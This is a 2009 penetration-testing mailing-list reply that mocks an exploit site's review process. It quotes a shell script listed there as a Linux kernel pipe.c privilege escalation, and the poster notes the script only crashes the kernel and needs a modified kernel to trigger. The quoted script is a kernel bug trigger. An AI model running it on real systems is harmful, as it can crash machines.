Penetration Testing mailing list archives

Re: Possible Milw0rm replacement?


From: Siim Põder <siim () p6drad-teel net>
Date: Tue, 17 Nov 2009 15:04:41 +0200

Hi

Tom Green wrote:
http://exploits.offensive-security.com/

Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":
while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Not only would that just OOPS the kernel and kill the process, it also
needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The
discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site ;)

Siim
